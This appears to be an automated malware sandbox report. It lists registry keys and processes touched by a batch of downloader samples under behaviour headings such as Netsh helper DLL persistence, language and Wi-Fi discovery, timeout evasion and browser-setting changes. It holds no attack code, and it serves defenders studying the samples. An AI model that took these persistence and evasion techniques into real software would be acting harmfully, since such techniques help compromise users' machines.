Embeds OpenSSL

Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\center.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\in.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BWCStartMSI.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\BWCStartMSI.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\downloader.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\t.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-B9IG3.tmp\stories.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\sysnldcvmr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\3076928777.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\PDFReader.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\random.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stories.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TuneAudioTool 2012.3.8200\tuneaudiotool32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TPB-1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\choice.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\QuizPokemon.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\QuizPokemon.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Control Panel\Desktop\TileWallpaper = "0" C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Explorer.EXE N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133786810330824482" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1920x1080x96(1).bottom = "968" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix C:\Windows\system32\BackgroundTransferHost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1920x1080x96(1).top = "260" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1920x1080x96(1).right = "1556" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\system32\BackgroundTransferHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MaxPos1920x1080x96(1).x = "4294967295" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Mode = "1" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1920x1080x96(1).top = "327" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\MuiCache C:\Windows\system32\BackgroundTransferHost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1092616257" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1920x1080x96(1).y = "4294967295" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\system32\BackgroundTransferHost.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1920x1080x96(1).x = "4294967295" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MaxPos1920x1080x96(1).y = "4294967295" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe10000000c31c8bd7af18db019ca068d0c318db01331211f7644edb0114000000 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1920x1080x96(1).left = "417" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0" C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3\NodeSlot = "9" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1920x1080x96(1).right = "2145" C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3\MRUListEx = ffffffff C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1920x1080x96(1).bottom = "901" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
